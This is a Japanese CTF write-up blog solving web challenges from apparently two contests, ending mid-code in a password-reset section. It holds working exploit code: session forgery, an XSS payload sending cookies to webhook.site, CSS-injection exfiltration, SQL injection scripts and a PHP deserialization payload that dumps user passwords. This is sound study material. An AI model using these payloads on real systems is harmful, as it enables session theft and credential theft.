4/20 - 4/21という日程で開催された。BunkyoWesternsのぽよ～～～～として参加して3位。プレースホルダのつもりで適当なユーザ名にしたのだけれども、後から変えようとしたら "Name changes are disabled" と怒られて困った。

Webを全完した。Fearless ConcurrencyとNo Sql Injectionが特に面白かった。

リンク:

• 問題リポジトリ・公式writeup

---

• [Web 100] Baby Web (183 solves)
• [Web 100] Greyctf Survey (154 solves)
• [Web 100] Markdown Parser (114 solves)
• [Web 100] Beautiful Styles (70 solves)
• [Web 171] Fearless Concurrency (49 solves)
• [Web 995] No Sql Injection (5 solves)

[Web 100] Baby Web (183 solves)

I just learnt how to design my favourite flask webpage using htmx and bootstrap. I hope I don't accidentally expose my super secret flag.

(URL)

Author: Junhua

添付ファイル: dist-baby-web.zip

次のようなソースコードが与えられている。セッションに is_admin かどうかの情報が保存されていて、もし is_admin が True ならばフラグを得られそうだ。ただし、コード中には is_admin を False に設定する処理しかない。

Flaskのデフォルト設定ということでクライアントセッションが使われるはずだけれども、その署名に使われる秘密鍵が app.secret_key = "baby-web" から分かってしまう。これを使ってセッションを偽造しよう。

import os
from flask import Flask, render_template, session

app = Flask(__name__)
app.secret_key = "baby-web"
FLAG = os.getenv("FLAG", r"grey{fake_flag}")


@app.route("/", methods=["GET"])
def index():
    # Set session if not found
    if "is_admin" not in session:
        session["is_admin"] = False
    return render_template("index.html")


@app.route("/admin")
def admin():
    # Check if the user is admin through cookies
    return render_template("admin.html", flag=FLAG, is_admin=session.get("is_admin"))

### Some other hidden code ###


if __name__ == "__main__":
    app.run(debug=True)

次のようなスクリプトを使ってセッションを偽造する。

from flask import Flask, render_template, session

app = Flask(__name__)
app.secret_key = "baby-web"

@app.route("/", methods=["GET"])
def index():
    session["is_admin"] = True
    return 'ok'

if __name__ == "__main__":
    app.run(debug=True)

できあがったセッションをCookieに設定して /admin にアクセスするとフラグが得られた。

grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g}

[Web 100] Greyctf Survey (154 solves)

Your honest feedback is appreciated :) (but if you give us a good rating we'll give you a flag)

(URL)

Author: jro

添付ファイル: dist-greyctf-survey.zip

次のようなソースコードが与えられている。点数を投票すると元々 -0.42069 という値が入っている score に加算される。このスコアが 1 を超えるとフラグをくれるけれども、投票できる点数は -1 より大きく、1 より小さくなければならない。どうしろと。

よく見ると、typeof vote != 'number' と投票した点数が Number であることをすでに確認しているのに、その後わざわざ parseInt にかけている。数値を丸めたいのなら Math.floor なり Math.round なりを使えばよいのに、なぜわざわざ parseInt を使うのだろう。

const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const port = 3000

const config = require("./config.json");

app.use(bodyParser.json())

app.use("/", express.static("static"))

let score = -0.42069;

app.get("/status", async (req, res)=>{
    return res.status(200).json({
        "error": false,
        "data": score
    });
})

app.post('/vote', async (req, res) => {
    const {vote} = req.body;
    if(typeof vote != 'number') {
        return res.status(400).json({
            "error": true,
            "msg":"Vote must be a number"
        });
    }
    if(vote < 1 && vote > -1) {
        score += parseInt(vote);
        if(score > 1) {
            score = -0.42069;
            return res.status(200).json({
                "error": false,
                "msg": config.flag,
            });
        }
        return res.status(200).json({
            "error": false,
            "data": score,
            "msg": "Vote submitted successfully"
        });
    } else {
        return res.status(400).json({
            "error": true,
            "msg":"Invalid vote"
        });
    }
})

app.listen(port, () => {
    console.log(`Survey listening on port ${port}`)
})

JavaScriptでは 3e-100 のような指数表記も使われる。parseInt の呼び出し時には、引数がたとえ数値であっても必ず文字列に変換される、つまり parseInt(3e-100) と parseInt('3e-100') は等価だけれども、このとき parseInt は頭の数字の部分だけを使って数値に変換しようとする。つまり、その返り値は 3 となる。parseInt での数値の丸めは vote < 1 && vote > -1 というチェックの後なので、このチェックは通過しつつ score には 3 が足されるということになる。

ということで、3e-100 点を投票するとフラグが得られた。

$ curl http://(省略)/vote -H "Content-Type: application/json" -d '{"vote":3e-100}'
{"error":false,"msg":"grey{50m371m35_4_l177l3_6035_4_l0n6_w4y}"}

grey{50m371m35_4_l177l3_6035_4_l0n6_w4y}

[Web 100] Markdown Parser (114 solves)

I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting!

(URL)

Author: ocean

添付ファイル: dist-markdown-parser.zip

Markdownが使えるメモ帳だ。作ったメモはadmin botに通報して、Chromiumで巡回させることができる。このとき、admin botはCookieにフラグを携えてやってくる。このCookieは httpOnly ではないから、XSSに持ち込めれば document.cookie を抽出して外部に抜き出すことでフラグが得られるはずだ。

Markdownのパースと変換は、次の通りライブラリを使わず自前で実装されている。基本的には escapeHtml でエスケープされてしまうけれども、コードブロックのときだけは、指定した言語名がエスケープされず class 属性に突っ込まれる。ここでXSSができそうだ。

function parseMarkdown(markdownText) {
    const lines = markdownText.split('\n');
    let htmlOutput = "";
    let inCodeBlock = false;

    lines.forEach(line => {
        if (inCodeBlock) {
            if (line.startsWith('```')) {
                inCodeBlock = false;
                htmlOutput += '</code></pre>';
            } else {
                htmlOutput += escapeHtml(line) + '\n';
            }
        } else {
            if (line.startsWith('```')) {
                language = line.substring(3).trim();
                inCodeBlock = true;
                htmlOutput += '<pre><code class="language-' + language + '">';
            } else {
                line = escapeHtml(line);
                line = line.replace(/`(.*?)`/g, '<code>$1</code>');
                line = line.replace(/^(######\s)(.*)/, '<h6>$2</h6>');
                line = line.replace(/^(#####\s)(.*)/, '<h5>$2</h5>');
                line = line.replace(/^(####\s)(.*)/, '<h4>$2</h4>');
                line = line.replace(/^(###\s)(.*)/, '<h3>$2</h3>');
                line = line.replace(/^(##\s)(.*)/, '<h2>$2</h2>');
                line = line.replace(/^(#\s)(.*)/, '<h1>$2</h1>');
                line = line.replace(/\*\*(.*?)\*\*/g, '<strong>$1</strong>');
                line = line.replace(/__(.*?)__/g, '<strong>$1</strong>');
                line = line.replace(/\*(.*?)\*/g, '<em>$1</em>');
                line = line.replace(/_(.*?)_/g, '<em>$1</em>');
                htmlOutput += line;
            }
        }
    });

    return htmlOutput;
}

function escapeHtml(text) {
    return text
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#039;');
}

module.exports = {
    parseMarkdown
};

"></pre><script>navigator.sendBeacon('https://webhook.site/…', document.cookie)</script> というような言語名でコードブロックを作成する。これで出来上がったメモを通報すると、フラグが指定したURLにPOSTされた。

grey{m4rkd0wn_th1s_fl4g}

[Web 100] Beautiful Styles (70 solves)

I opened a contest to see who could create the most beautiful CSS styles. Feel free to submit your CSS styles to me and I will add them to my website to judge them. I'll even give you a sample of my site to get you started. Flag only consists of numbers and uppercase letters and the lowercase character f (the exception is the flag format of grey{.+})

(URL)

Author: Junhua

与えられたURLにアクセスすると、次のようにCSSの入力フォームが表示された。

<details> で隠されているのは、次のようなHTMLだ。投稿したCSSは /uploads/(ランダムなID).css に保存される。投稿後は /submission/(ランダムなID) にリダイレクトされるけれども、その内容は次のテンプレートにそのIDやらフラグやらが展開されたHTMLだ。

また、そのページにはadmin botへの通報フォームがある。通報するとbotがChromiumでアクセスしてくれる。通常展開されているフラグはダミーのものだけれども、botがアクセスする際には本物のフラグが入っているということだろう。なるほど、任意のCSSが設定できるので、これで input の値を外部に送信せよということらしい。CSS Injectionの要領でできそうだ。

<!DOCTYPE html>
<html lang="en">
  <head>
…
    <link href="/uploads/{{submit_id}}.css" rel="stylesheet" />
  </head>
  <body>
    <div class="container">
      <h1 id="title">Welcome to my beautiful site</h1>
      <p id="sub-header">
        Here is some content that I want to share with you. An example can be
        this flag:
      </p>
      <input id="flag" value="{{ flag }}" />
    </div>
…
  </body>
</html>

1文字ずつ抽出して外部に送信してくれるスクリプトを書く。1文字ずつ確定させていく。

import re
import string
import httpx

table = '{}' + string.ascii_uppercase + string.digits + 'f'
flag = 'grey{'

css = ''
for c in table:
    css += 'input[value^="FLAGCHAR"] { background: url("https://webhook.site/…?FLAGCHAR"); }\n'.replace('FLAG', flag).replace('CHAR', c)

print(css)

with httpx.Client(base_url='http://(省略)/', timeout=300) as client:
    r = client.post('/submit', data={
        'css_value': css
    })
    p = re.findall(r'href="(/submission/[^"]+)"', r.text)[0]
    client.post(p.replace('submission', 'judge'))

これでフラグが分かった。

grey{X5S34RCH1fY0UC4NF1ND1T}

[Web 171] Fearless Concurrency (49 solves)

Rust is the most safest, fastest and bestest language to write web app! The code compiles, therefore it is impossible for bugs! PS: This is my first rust project (real) 🦀🦀🦀🦀🦀

(URL)

Author: jro

添付ファイル: dist-fearless-concurrency.zip

Rustのソースコードが与えられている⚙ flag で検索してみると、/flag でいい感じの入力を与えるとフラグをくれることがわかる。ここで必要な入力は user_id と secret で、user_id で指定したユーザに対応する secret と入力した secret が一致していればフラグをくれるようだ。

    let app = Router::new()
        .route("/", get(root))
        .route("/register", post(register))
        .route("/query", post(query))
        .route("/flag", post(flag))
        .with_state(state);
// …
#[derive(Deserialize)]
struct ClaimFlag {
    user_id: u64,
    secret: u32
}

async fn flag(State(state): State<AppState>, Json(body): Json<ClaimFlag>)  -> axum::response::Result<String> {
    let users = state.users.read().await;
    let user = users.get(&body.user_id).ok_or_else(|| "User not found! Register first!")?;

    if user.secret == body.secret {
        return Ok(String::from("grey{fake_flag_for_testing}"));
    }
    Ok(String::from("Wrong!"))
}

POST /register は次の通り。POSTだけれども特にパラメータは受け付けず、ランダムにユーザIDが生成され、それに対応するユーザの登録がなされる。

async fn register(State(state): State<AppState>) -> impl IntoResponse {
    let uid = rand::random::<u64>();
    let mut users = state.users.write().await;
    let user = User::new();
    users.insert(uid, user);
    uid.to_string()
}

なお、User という構造体の定義は次の通り。secret はランダムな32ビットの数値らしい。

#[derive(Clone)]
struct User {
    lock: Arc<Mutex<()>>,
    secret: u32
}

impl User {
    fn new() -> User {
        User {
            lock: Arc::new(Mutex::new(())),
            secret: rand::random::<u32>()
        }
    }
}

POST /query は次の通り。長いので整理する。ユーザからは user_id と query_string という2つのパラメータを受け付ける。まずMySQLで tbl_(ユーザID)_(ランダムな数値) というテーブルが作成され、これに指定した user_id の secret が挿入される。その後、SELECT * FROM info WHERE body LIKE '(query_stringで指定した文字列)' というSQLが実行される。そして、最初に作成されたテーブルが削除される。レスポンスに含まれるのは SELECT で返ってきた情報だ。なお、ユーザ情報は secret 含めRust側ですべて管理されていて、ここではMySQLに secret の情報がコピーされているに過ぎない。

SELECT 文で明らかにSQLiがある。ただ、' union select secret from (テーブル名);# のようにSQLiで secret を抜き出そうにも、ランダムに生成されているためにテーブル名を当てることができない。ならばと information_schema.tables からテーブル名を抜き出しても、直後にそのテーブルが削除されてしまう。どうしろと。

async fn query(State(state): State<AppState>, Json(body): Json<Query>) -> axum::response::Result<String> {
    let users = state.users.read().await;
    let user = users.get(&body.user_id).ok_or_else(|| "User not found! Register first!")?;
    let user = user.clone();

    // Prevent registrations from being blocked while query is running
    // Fearless concurrency :tm:
    drop(users);

    // Prevent concurrent access to the database!
    // Don't even try any race condition thingies
    // They don't exist in rust!
    let _lock = user.lock.lock().await;
    let mut conn = state.pool.get_conn().await.map_err(|_| "Failed to acquire connection")?;

    // Unguessable table name (requires knowledge of user id and random table id)
    let table_id = rand::random::<u32>();
    let mut hasher = Sha1::new();
    hasher.update(b"fearless_concurrency");
    hasher.update(body.user_id.to_le_bytes());
    let table_name = format!("tbl_{}_{}", hex::encode(hasher.finalize()), table_id);

    let table_name = dbg!(table_name);
    let qs = dbg!(body.query_string);

    // Create temporary, unguessable table to store user secret
    conn.exec_drop(
        format!("CREATE TABLE {} (secret int unsigned)", table_name), ()
    ).await.map_err(|_| "Failed to create table")?;

    conn.exec_drop(
        format!("INSERT INTO {} values ({})", table_name, user.secret), ()
    ).await.map_err(|_| "Failed to insert secret")?;


    // Secret can't be leaked here since table name is unguessable!
    let res = conn.exec_first::<String, _, _>(
        format!("SELECT * FROM info WHERE body LIKE '{}'", qs),
        ()
    ).await;

    // You'll never get the secret!
    conn.exec_drop(
        format!("DROP TABLE {}", table_name), ()
    ).await.map_err(|_| "Failed to drop table")?;

    let res = res.map_err(|_| "Failed to run query")?;

    // _lock is automatically dropped when function exits, releasing the user lock

    if let Some(result) = res {
        return Ok(result);
    }
    Ok(String::from("No results!"))
}

' union select @x;# のように変数でテーブル名を指定できないかと試したところ、通常のクエリ失敗時に起こる Failed to run query は返ってこず、そもそも何もレスポンスが返ってこなかった。ログを見るとパニックが起こったようだ。つまり、以降の DROP TABLE は実行されず、テーブルはそのまま残っている。これなら、残ったテーブルの名前を取得して、さらにそれを元に secret を得ることも可能だ。

以下のようにスクリプトを書く。わざわざテーブル名の取得時に order by create_time desc limit 1 offset 1 とテーブルの作成日時でソートしているのは、ほかの参加者が作成して同じ方法で残したテーブルが大量にあるためだ。最近作成した順にソートすることで、自分の作成したテーブルが前に来る。

import time
import httpx

with httpx.Client(base_url='http://(省略)') as client:
    r = client.post('/register')
    uid = int(r.text)

    try:
        client.post('/query', json={
        'user_id': uid,
        'query_string': "' union select @x;#"
    })
    except:
        pass

    time.sleep(1)

    r = client.post('/query', json={
        'user_id': uid,
        'query_string': "' union select * from (select table_name from information_schema.tables where table_schema = database() order by create_time desc limit 1 offset 1)x;#"
    })
    table = r.text

    r = client.post('/query', json={
        'user_id': uid,
        'query_string': f"' union select * from {table};#"
    })
    secret = int(r.text)

    r = client.post('/flag', json={
        'user_id': uid,
        'secret': secret
    })
    print(r.text)

実行すると、フラグが得られた。

$ python3 s.py
grey{ru57_c4n7_pr3v3n7_l061c_3rr0r5}

grey{ru57_c4n7_pr3v3n7_l061c_3rr0r5}

[Web 995] No Sql Injection (5 solves)

I asked My friend Jason to build me a new e-commerce website. We just finished the login system and there's already bugs 🤦

(URL)

Author: jro

添付ファイル: dist-no-sql-injection.zip

ソースコードを見ていく。MySQLには次のような2つのテーブルが存在している。

create table tokens(token varchar(255));
create table users(
    id INT AUTO_INCREMENT PRIMARY KEY,
    name varchar(255),
    password varchar(255),
    admin bool
);

このWebサーバには主に次の3つのエンドポイントが存在している。

• POST /api/login
• POST /api/register/1
• POST /api/register/2

それぞれ対応するコードを見ていこう。まずは /api/login だけれども、その名の通りユーザ名とパスワードを受け取って、users テーブルに対応するユーザが存在するか確認してくれるAPIだ。このとき、もし admin が true であればフラグを返してくれるらしい。なるほど、admin が true であるユーザを作成するのがゴールらしい。

const decode = s => atob(s?.toString() ?? 'Z3JleWhhdHMh');

app.post('/api/login', async (req, res) => {
    try {
        let { password, username } = req.body;
        password = decode(password);
        username = decode(username);

        const result = await query("select admin from users where name = ? and password = ?", [username, password]);

        if (result.length != 1) {
            return res.json({ err: "Username or password did not match" });
        }

        if(result[0].admin) {
            res.json({ "err": false, "msg": config.flag});
        } else {
            res.json({ "err": false, "msg": "You've logged in successfully, but there's no flag here!"});
        }

        // Prevent too many records from filling up the database
        await query("delete from users where name = ? and password = ?", [username, password]);
    } catch (err) {
        console.log(err);
        res.json({ "err": true });
    }
})

/api/register/1 は次の通り。受け取ったユーザ名に対応するトークンを tokens テーブルに挿入している。このトークンはJSONをBase64エンコードしたものだけれども、ここで name というプロパティには指定したユーザ名が、admin には false が設定されている。

app.post('/api/register/1', async (req, res) => {
    try {
        let { username } = req.body;

        username = decode(username);

        const token = btoa(JSON.stringify({
            name: username,
            admin: false
        }));

        await query("insert into tokens values (?)", [token]);

        res.json({ "err": false, "token": token });
    } catch (err) {
        console.log(err);
        res.json({ "err": true });
    }
})

最後に /api/register/2 を見ていく。今度はリクエストボディからパスワードとトークンを受け取っている。まず、tokens にそのトークンが存在しているか(つまり、/api/register/1 によって発行されたトークンであるか)をチェックしている。もしあれば、tokens からこのトークンを削除したうえで、トークンをJSONとしてパースした結果から name と admin の2つのプロパティを、リクエストボディからはパスワードを持ってきて、users テーブルにこのユーザを登録する。

/api/register/1 では admin には false しか設定されないし、SQLiをしようにもちゃんとプレースホルダが使われていて、そのような隙はないように見える。どうすればよいだろうか。

app.post('/api/register/2', async (req, res) => {
    try {
        let { password, token } = req.body;
        password = decode(password);
        token = decode(token);

        const result = await query("select 1 from tokens where token = ?", [token]);

        if (result.length != 1) {
            return res.json({ err: "Token not found!" });
        }

        await query("delete from tokens where token = ?", [token]);

        const { name, admin } = JSON.parse(atob(token));

        await query("insert into users (name, password, admin) values (?, ?, ?)", [name.toString(), password, admin === true]);

        res.json({ "err": false });
    } catch (err) {
        console.log(err);
        res.json({ "err": true });
    }
})

ふと、MySQLのデフォルトの設定では文字列比較がcase-insensitiveに行われることを思い出した。これを利用すれば、たとえば /api/register/1 で発行されたトークンが eyJuYW1lIjoibmVrbyIsImFkbWluIjpmYWxzZX0= であったときに、28文字目の u を大文字の U に変換した eyJuYW1lIjoibmVrbyIsImFkbWlUIjpmYWxzZX0= も /api/register/2 でトークンとして利用できてしまう。

これをBase64デコードすると {"name":"neko","admiT":false} であり、admin プロパティが admiT プロパティに変わってしまっている。/api/register/2 では、users に挿入されるユーザの情報はトークンに含まれているものが参照されているけれども、ここで参照するトークンは tokens テーブルに含まれているマスターデータではなく、このときリクエストボディから投げられた方のトークンだ。

この性質を利用して、いい感じに admin プロパティが true となっているJSONを作成したい。

次のような構造のJSONを考える。/api/register/1 において poyopoyopoyoXXX , XXXadminXXX :true, XXXhogXXX: XXX というようなユーザ名で登録するとこのようなJSONが作成され、それをBase64エンコードしたものがトークンとして発行されるはずだ。発行されたトークンについて、特定の文字の大文字小文字を変換することで、XXX がそれぞれいい感じに、正規表現でいう \s*"\s* へ化けるような文字はないだろうか。

そのような文字があれば、まずそれを使ったユーザ名で正規のトークンを発行し、特定の文字の大文字小文字を変換することで {"name":"poyopoyopoyo","admin":true,"hog":"","admin":false} に相当するJSONがBase64エンコードされたトークンが作れるはずだ。

{"name":"poyopoyopoyoXXX ,  XXXadminXXX :true,  XXXhogXXX:  XXX","admin":false}

ちゃんと考えて作ればよいのだけれども、面倒になってしまった。次のようにしてブルートフォースで探す。

let s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

function *f(s) {
    for (const a of s) {
        for (const b of s) {
            for (const c of s) {
                for (const d of s) {
                    yield a + b + c + d;
                }
            }
        }
    }
}

function *g(s) {
    for (const a of [s[0].toLowerCase(), s[0].toUpperCase()]) {
        for (const b of [s[1].toLowerCase(), s[1].toUpperCase()]) {
            for (const c of [s[2].toLowerCase(), s[2].toUpperCase()]) {
                for (const d of [s[3].toLowerCase(), s[3].toUpperCase()]) {
                    const t = a + b + c + d;
                    if (s !== t) {
                        yield a + b + c + d;
                    }
                }
            }
        }
    }
}

for (const a of f(s)) {
    let s1, s2, o1, o2;

    //s1 = `eyJuYW1lIjoicG95b3BveW9wb3lv${a}ICwg${a}YWRtaW4iOjEyM30=`;
    s1 = `eyJuYW1lIjoicG95b3BveW9wb3lvIiAg${a}ImFkbWluIjoxMjN9`;
    try {
        o1 = JSON.parse(atob(s1));
    } catch {
        continue;
    }

    for (const b of g(a)) {
        //s2 = `eyJuYW1lIjoicG95b3BveW9wb3lv${b}ICwg${b}IiwgImFkbWluIjoxMjN9`;
        s2 = `eyJuYW1lIjoi${b}b3BveW9wb3lvIiAgImFkbWluIjoxMjN9`;
        try {
            o2 = JSON.parse(atob(s2));
            console.log('[*]', a, b);
            break;
        } catch {
            continue;
        }
    }

    if (o2 == undefined) {
        continue;
    }

    console.log(s1, o1);
    console.log(s2, o2);
}

Base64では1文字あたり6ビットの情報を持つ。つまり4文字が元データの3バイトに対応するわけだけれども、それによって発生するズレも考える必要がある。次のように、どうしても微妙な位置に先ほどの例で言う XXX に対応する文字が入ってしまう場合も考慮しつつ、適切な文字を探していく。

// …

for (const a of f(s)) {
    let s1, s2, o1, o2, b;

    // swapcase後のものを導き出す = JSONの構造を破壊するものを探す
    s1 = `eyJuYW1lIjoicG95b3BveW9wb3lvQUFBICwgICBCQkJhZG1pbi${a}A6dHJ1ZSwgQUFBaG9nQUFBOiAgQUFBIiwiYWRtaW4iOjEyM30=`.replaceAll('QUFB', 'ICAi').replaceAll('BCQk', 'AJCS');
    try {
        o1 = JSON.parse(atob(s1));
    } catch {
        continue;
    }

    // swapcase前のものを導き出す
    for (b of g(a)) {
        s2 = `eyJuYW1lIjoicG95b3BveW9wb3lvQUFBICwgICBCQkJhZG1pbi${b}A6dHJ1ZSwgQUFBaG9nQUFBOiAgQUFBIiwiYWRtaW4iOjEyM30=`.replaceAll('QUFB', 'icai').replaceAll('BCQk', 'ajcs');
        try {
            o2 = JSON.parse(atob(s2));
            break;
        } catch {
            continue;
        }
    }

    if (o2 == undefined || Object.keys(o1).length === 4) {
        continue;
    }

    console.log('[*]', a, b);

    console.log(s1, o1);
    console.log(s2, o2);
}

最終的に、次の組み合わせができた。前者のユーザ名をまず /api/register/1 に投げて、トークンをデータベースに登録させる。生成されたトークンの一部の文字について、大文字と小文字を変換すると後者の偽トークンができあがる。これを /api/register/2 に投げると、ユーザ名は poyopoyopoyo 、パスワードはリクエストボディから指定したもの、admin は true であるユーザが作れるはずだ。

eyJuYW1lIjoicG95b3BveW9wb3lvicaiICwgICajcsJhZG1pbiijcsA6dHJ1ZSwgicaiaG9nicaiOiAgicaiIiwiYWRtaW4iOmZhbHNlfQ==
→ {"name":"poyopoyopoyo\x89Æ¢ ,  &£rÂadmin(£rÀ:true, \x89Æ¢hog\x89Æ¢:  \x89Æ¢","admin":false}
eyJuYW1lIjoicG95b3BveW9wb3lvICAiICwgICAJCSJhZG1pbiIJCSA6dHJ1ZSwgICAiaG9nICAiOiAgICAiIiwiYWRTaW4iOmZhbHNlfQ==
→ {"name":"poyopoyopoyo  " ,   \t\t"admin"\t\t :true,   "hog  ":    "","adSin":false}

できた。

$ curl http://(省略)/api/register/1 -d 'username=cG95b3BveW9wb3lvicaiICwgICajcsJhZG1pbiijcsA6dHJ1ZSwgicaiaG9nicaiOiAgicai'
{"err":false,"token":"eyJuYW1lIjoicG95b3BveW9wb3lvicaiICwgICajcsJhZG1pbiijcsA6dHJ1ZSwgicaiaG9nicaiOiAgicaiIiwiYWRtaW4iOmZhbHNlfQ=="}
$ curl http://(省略)/api/register/2 -d 'password=cG95b3BveW9wb3lv&token=ZXlKdVlXMWxJam9pY0c5NWIzQnZlVzl3YjNsdklDQWlJQ3dnSUNBSkNTSmhaRzFwYmlJSkNTQTZkSEoxWlN3Z0lDQWlhRzluSUNBaU9pQWdJQ0FpSWl3aVlXUlRhVzRpT21aaGJITmxmUT09'
{"err":false}
$ curl http://(省略)/api/login -d 'password=cG95b3BveW9wb3lv&username=cG95b3BveW9wb3lvICA='
{"err":false,"msg":"grey{fr13nd5h1p_3nd3d_w17h_my5ql}"}

grey{fr13nd5h1p_3nd3d_w17h_my5ql}

4/6 - 4/8という日程で開催された。BunkyoWesternsの🦌ta_ga_naiとして参加して5位。特にコンテナエスケープ問が面白かったし勉強になった。BunkyoWesternsはあと1問で全完というところまでいったのだけれども、[Forensics] Volatileというエスパー要素のあるメモリフォレンジック問にやられた。

目的が読み取れない問題文でメモリフォレンジックを行う必要があるというだけでも、目当てがないままにプロセスにリストやら開かれているファイルのハンドルやら、得られる情報を片っ端から調べる必要がありつらいが、そこにエスパー要素まで加わってくるともうダメだ。メモリフォレンジック問だから真面目にやれば解けるのだとは考えず、やれることはやって何も見つからなかった時点でエスパー問のための思考に切り替える必要があったとは思う。

---

• [Web 100] Cereal (101 solves)
• [Web 100] Forgotten Password (141 solves)
• [Web 191] Flipped (89 solves)
• [Web 388] Cracked (53 solves)
• [Web 440] Imposter (40 solves)
• [Web 454] Remote (35 solves)
• [Cryptography 464] Jumbled (30 solves)
• [Forensics 486] SMP (20 solves)
• [Forensics 486] MCFS (20 solves)
• [Misc 499] Scavenging (7 solves)
• [Misc 499] Over The Shoulder (7 solves)

[Web 100] Cereal (101 solves)

Just made a new website. It's a work in progress, please don't judge...

(URL)

添付ファイル: cereal.zip

与えられたURLにアクセスすると、以下のようなログインフォームが表示される。表示されているcredsでログインすると "Welcome guest!" と言われる。それだけ。

Cookieに auth というキーで以下のような値が入っている。ログイン情報をここに保存しているらしい。

Tzo0OiJVc2VyIjo0OntzOjg6InVzZXJuYW1lIjtzOjU6Imd1ZXN0IjtzOjI6ImlkIjtpOjE7czoxMToiACoAcGFzc3dvcmQiO3M6MzI6IjVmNGRjYzNiNWFhNzY1ZDYxZDgzMjdkZWI4ODJjZjk5IjtzOjEwOiIAKgBwcm9maWxlIjtOO30%3D

ソースコードを読んでいく。authenticate.php にログイン周りの処理が詰まっている。なるほど、User という色々とユーザの情報が入っているクラスのインスタンスを serialize でシリアライズし、Base64エンコードして先程のCookieに保存しているようだ。

<?php
…
// Creating cookie
if ($row['username'] === $username && $row['password'] === $password) {
    $cookie_name='auth';
    $cookie = new User();
    $cookie->username = $username;
    $cookie->id = (int)$row['id'];
    $cookie->setPassword(md5($row['password']));
    setcookie($cookie_name, base64_encode(serialize($cookie)), time() + (86400 * 30), "/");
    echo 'Welcome ' . $username . '! ' . '<br><br><a href="home.php"><i class="fas fa-user-circle"></i>Home</a>';
} else {

home.php を読むと、確かにこの auth というCookieについて、Base64デコードして unserialize で元のオブジェクトを復元し、以降それを参照している様子が確認できる。署名はないので、いくらでもその値を改ざんできる。好きなものを unserialize できるということで、これはInsecure Deserialization(PHPなのでPHP Object Injectionとも言う)だ。

<?php
require_once('config.php');

// Check if logged in
if (!isset($_COOKIE['auth']) || empty($_COOKIE['auth'])) {
    header('Location: logout.php');
    exit;
}

$cookie = unserialize(base64_decode($_COOKIE['auth']));

?>
…

さて、このInsecure Deserializationによってどんなオブジェクトが作れると嬉しいか。Dockerfile は配布されていないし、ソースコード中で flag や gigem 等を検索しても何も見つからないので、フラグが表示される条件はよくわからない。とりあえずここから別の攻撃に発展させられないか、ソースコードを読みつつ考えていこう。

User の実装を見ていく。PHPでは unserialize でデシリアライズされた際にそのオブジェクトの __wakeup というメソッドが呼ばれるわけだけれども、User については validate と refresh を呼んでいることがわかる。

validate では username と password の2つのプロパティを使いつつ、これらのcredsについて実在するユーザのものであるかを確認している。ちゃんとプレースホルダを使っているのでSQLiは発生していない。

続いて refresh が行われ、そのユーザのプロフィールを取得しているわけだけれども、今度は id と username というプロパティを参照している。なぜか今度はプレースホルダを使っておらず、明らかにSQLiがある。username の方は validate でも参照されるからいじれないけれども、id はいくらでもいじれる。こちらからSQLiができそうだ。

<?php
class User {
  public $username = '';
    public $id = -1;
    
    protected $password = '';
    protected $profile;

    public function setPassword($pass) {
        $this->password = $pass;
    }

    public function sendProfile() {
        return $this->profile;
    }

    public function refresh() {
        // Database connection
        $conn = new PDO('sqlite:../important.db');
        $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $query = "select username, email, favorite_cereal, creation_date from users where `id` = '" . $this->id . "' AND `username` = '" . $this->username . "'";
        $stmt = $conn->prepare($query);
        $stmt->execute();
        $row = $stmt->fetch();

        $this->profile = $row;
    }

    public function validate() {
        // Database connection
        $conn = new PDO('sqlite:../important.db');
        $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $query = "select * from users where `username` = :username";
        $stmt = $conn->prepare($query);
        $stmt->bindParam(':username', $this->username);
        $stmt->execute();
        $row = $stmt->fetch();

        if (md5($row['password']) !== $this->password) {
            header('Location: logout.php');
            exit;
        }
    }

    public function __wakeup() {
        $this->validate();
        $this->refresh();
        }
}

?>

次のようなPHPコードを用意して、Cookieにセットすると細工した User がデシリアライズされる文字列を作る。

<?php
class User {
    function __construct() {
        $this->username = 'guest';
        $this->password = '5f4dcc3b5aa765d61d8327deb882cf99';
        $this->id = "' union select group_concat(sql),2,3,4 from sqlite_master; -- ";
        $this->profile = 'poyo';
    }
}

echo base64_encode(serialize(new User)) . "\n";

?>

出力された文字列をCookieにセットして、プロフィールが表示されるページを閲覧する。次のように、SQLiによってデータベースに存在するテーブルの作成に使われたSQLを取り出すことができた。

今度はSQLiのペイロードを ' union select group_concat(username),group_concat(password),3,4 from users; -- に変更し、すべてのユーザのユーザ名とパスワードを抽出する。admin というユーザのパスワードがフラグだった。

[Web 100] Forgotten Password (141 solves)

Author: bit

We discovered that this blog owner's email is b8500763@gmail.com through reconaissance. We do not have access to the password of the account, how could we login regardless?

(URL)

添付ファイル: forgotten-password.zip

与えられたURLにアクセスすると、次のようなログインフォームが表示される。

パスワードを忘れてしまった際のパスワードリセット用フォームもある。メールアドレスを入力すればよいようだ。

ソースコードを見ていく。まず、次のようなディレクトリ構造からRuby on Rails製のアプリだとわかる。

$ tree -d -L 2 .
.
├── app
│   ├── assets
│   ├── channels
│   ├── controllers
│   ├── javascript
│   ├── mailers
│   ├── models
│   └── views
├── bin
├── config
│   ├── environments
│   ├── initializers
│   └── locales
├── db
│   └── migrate
├── lib
│   ├── assets
│   └── tasks
├── log
├── public
├── storage
├── test
│   ├── controllers
│   ├── fixtures
│   ├── helpers
│   ├── integration
│   ├── mailers
│   ├── models
│   └── system
├── tmp
│   ├── pids
│   └── storage
└── vendor
    └── javascript

34 directories

パスワードリセット周りのロジックを見ていこう。app/controllers/auth_controller.rb がそれだ。入力されたメールアドレスに対応するユーザがいれば、そのメールアドレスに対してパスワードリセットのメッセージを送っている。

それはいいのだけれども、その入力されたメールアドレスに対応するユーザがいるかどうかのチェックがおかしい。params[:email].include?(user.email) かどうか、つまり入力されたメールアドレス「に」ユーザのメールアドレス「が」含まれているかを見ている。"b8500763@gmail.com"@example.com のようなものも許してしまうわけだ。

class AuthController < ApplicationController


  def login
  end

  def forget
  end

  def recover
    user_found = false
    User.all.each { |user|
      if params[:email].include?(user.email)
        user_found = true
        break
      end
    }

    if user_found
